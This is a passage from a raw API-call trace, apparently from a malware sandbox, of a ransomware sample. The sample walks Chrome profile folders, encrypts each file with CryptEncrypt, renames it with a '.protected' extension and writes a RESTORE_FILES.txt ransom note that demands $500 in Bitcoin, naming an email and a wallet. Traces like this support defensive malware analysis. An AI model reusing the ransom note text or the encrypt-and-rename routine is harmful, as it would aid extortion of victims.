HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\.") returned 95 [0084.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.128] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\..") returned 96 [0084.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.128] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.128] lstrcmpiW (lpString1="A058.tmp", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1="A058.tmp", lpString2="Program Files") returned -1 [0084.129] lstrcmpiW (lpString1="A058.tmp", lpString2="Program Files (x86)") returned -1 [0084.129] lstrcmpiW (lpString1="A058.tmp", lpString2="$Recycle.bin") returned 1 [0084.129] lstrcmpiW (lpString1="A058.tmp", lpString2="System Volume Information") returned -1 [0084.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrIW (lpFirst="A058.tmp", lpSrch=".protected") returned 0x0 [0084.129] lstrcmpW (lpString1="A058.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.129] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.129] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.129] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrW (lpFirst="A058.tmp", lpSrch=".txt") returned 0x0 [0084.129] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrW (lpFirst="A058.tmp", lpSrch=".rar") returned 0x0 [0084.129] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrW (lpFirst="A058.tmp", lpSrch=".zip") returned 0x0 [0084.129] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.129] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.129] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.129] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.130] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.130] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.130] CloseHandle (hObject=0x158) returned 1 [0084.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.protected") returned 112 [0084.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp.protected")) returned 1 [0084.131] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="Windows") returned -1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="Program Files") returned -1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="Program Files (x86)") returned -1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="$Recycle.bin") returned 1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="System Volume Information") returned -1 [0084.131] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.131] StrStrIW (lpFirst="A059.tmp", lpSrch=".protected") returned 0x0 [0084.131] lstrcmpW (lpString1="A059.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.131] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.131] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.132] StrStrW (lpFirst="A059.tmp", lpSrch=".txt") returned 0x0 [0084.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.132] StrStrW (lpFirst="A059.tmp", lpSrch=".rar") returned 0x0 [0084.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.132] StrStrW (lpFirst="A059.tmp", lpSrch=".zip") returned 0x0 [0084.132] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.132] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.132] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.133] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.133] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.133] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.133] CloseHandle (hObject=0x158) returned 1 [0084.134] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.protected") returned 112 [0084.134] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp.protected")) returned 1 [0084.134] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.134] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.134] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\RESTORE_FILES.txt") returned 111 [0084.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.136] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.136] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.137] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.137] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.137] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.137] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.137] CloseHandle (hObject=0x154) returned 1 [0084.137] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="Windows") returned -1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="Program Files") returned -1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="Program Files (x86)") returned -1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="$Recycle.bin") returned 1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="System Volume Information") returned -1 [0084.137] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned 96 [0084.137] lstrcmpW (lpString1="JumpListIconsOld", lpString2=".") returned 1 [0084.137] lstrcmpW (lpString1="JumpListIconsOld", lpString2="..") returned 1 [0084.137] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*") returned 98 [0084.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.138] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.138] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.138] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.138] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.138] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.138] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\.") returned 98 [0084.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.138] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.138] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.138] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.138] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.138] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.138] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.138] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\..") returned 99 [0084.138] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.138] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="Windows") returned -1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="Program Files") returned -1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="Program Files (x86)") returned -1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="$Recycle.bin") returned 1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="System Volume Information") returned -1 [0084.138] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.138] StrStrIW (lpFirst="2B03.tmp", lpSrch=".protected") returned 0x0 [0084.138] lstrcmpW (lpString1="2B03.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.139] StrStrW (lpFirst="2B03.tmp", lpSrch=".txt") returned 0x0 [0084.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.139] StrStrW (lpFirst="2B03.tmp", lpSrch=".rar") returned 0x0 [0084.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.139] StrStrW (lpFirst="2B03.tmp", lpSrch=".zip") returned 0x0 [0084.139] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.140] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.140] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.141] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.141] CloseHandle (hObject=0x158) returned 1 [0084.141] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.protected") returned 115 [0084.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp.protected")) returned 1 [0084.142] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="Windows") returned -1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="Program Files") returned -1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="Program Files (x86)") returned -1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="$Recycle.bin") returned 1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="System Volume Information") returned -1 [0084.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrIW (lpFirst="2B04.tmp", lpSrch=".protected") returned 0x0 [0084.142] lstrcmpW (lpString1="2B04.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.142] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.142] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrW (lpFirst="2B04.tmp", lpSrch=".txt") returned 0x0 [0084.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrW (lpFirst="2B04.tmp", lpSrch=".rar") returned 0x0 [0084.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrW (lpFirst="2B04.tmp", lpSrch=".zip") returned 0x0 [0084.142] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.143] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.143] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.144] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.144] CloseHandle (hObject=0x158) 